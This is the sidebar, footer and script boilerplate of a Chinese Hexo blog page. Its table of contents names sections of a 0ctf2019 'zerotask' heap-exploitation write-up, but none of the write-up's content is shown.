          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">e3pem</p>
              <p class="site-description motion-element" itemprop="description">记录学习过程的小Blog</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0ctf2019-zerotask题解"><span class="nav-number">1.</span> <span class="nav-text">0ctf2019-zerotask题解</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#程序功能分析"><span class="nav-number">1.1.</span> <span class="nav-text">程序功能分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#程序漏洞"><span class="nav-number">1.2.</span> <span class="nav-text">程序漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用方式一——劫持EVP-CIPHER-CTX-ptr指针实现利用"><span class="nav-number">1.3.</span> <span class="nav-text">利用方式一——劫持EVP_CIPHER_CTX_ptr指针实现利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#信息泄露"><span class="nav-number">1.3.1.</span> <span class="nav-text">信息泄露</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#劫持程序流程"><span class="nav-number">1.3.2.</span> <span class="nav-text">劫持程序流程</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用方式二——利用加密功能溢出配合tcache攻击getshell"><span class="nav-number">1.4.</span> <span class="nav-text">利用方式二——利用加密功能溢出配合tcache攻击getshell</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">e3pem</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
